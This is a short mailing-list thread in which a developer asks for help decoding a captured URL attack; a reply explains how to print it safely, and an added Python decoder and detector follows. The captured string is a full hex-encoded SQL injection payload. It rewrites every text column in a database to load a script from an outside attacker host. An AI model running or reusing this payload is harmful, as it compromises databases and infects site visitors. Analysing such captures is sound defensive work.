Put this in your SQL Query analyzer tool and change the EXEC at the end to
PRINT.  It should print out the SQL Statement for you to see what they were
trying to do.

Cheers,

Jeff 

-----Original Message-----
From: Che Vilnonis [mailto:ch...@asitv.com] 
Sent: Friday, May 13, 2011 7:31 AM
To: cf-talk
Subject: Can anyone decode this?


Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363
726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522
3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D
672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045
4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65
5F437572736F72 AS CHAR(4000));EXEC(@S); 

Thanks, Che
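Added example, not part of the original thread: a small Python decoder that recovers the SQL hidden in a `CAST(0x... AS CHAR)` parameter offline, so the captured string never has to be pasted into a database tool. The sample input is constructed and harmless; the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Hex literal inside CAST(0x... AS [N][VAR]CHAR). Whitespace is allowed inside
# the digits because mail clients and log viewers wrap long lines.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s*AS\s+(N?(?:VAR)?CHAR)", re.I)
# The decoded string only matters if it is then handed to EXEC(@var).
EXEC_VAR = re.compile(r"\bEXEC(?:UTE)?\s*\(\s*@\w+\s*\)", re.I)


def decode_cast_payloads(raw: str) -> list[str]:
    """Return the text hidden in each CAST(0x...) literal without running it."""
    text = unquote(raw)  # undo %20-style URL encoding first
    decoded = []
    for match in CAST_HEX.finditer(text):
        digits = re.sub(r"\s+", "", match.group(1))
        if len(digits) % 2:  # truncated capture: drop the odd nibble
            digits = digits[:-1]
        # NCHAR/NVARCHAR literals are UTF-16LE, CHAR/VARCHAR are single-byte.
        wide = match.group(2).upper().startswith("N")
        encoding = "utf-16-le" if wide else "latin-1"
        decoded.append(bytes.fromhex(digits).decode(encoding, errors="replace"))
    return decoded


def looks_like_hex_exec(raw: str) -> bool:
    """Flag the DECLARE / CAST(0x...) / EXEC(@var) pattern in a request value."""
    text = unquote(raw)
    return bool(CAST_HEX.search(text) and EXEC_VAR.search(text))


# Constructed sample: same wrapper shape as the captured string, benign body.
SAMPLE_SQL = "PRINT 'constructed sample'"
SAMPLE = ("id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
          + SAMPLE_SQL.encode("latin-1").hex().upper()
          + "%20AS%20CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    print("suspicious:", looks_like_hex_exec(SAMPLE))
    for sql in decode_cast_payloads(SAMPLE):
        print(sql)
```

To use it on a real capture, pass the logged query string (line breaks included) to `decode_cast_payloads` and read the result as text only.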






Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344495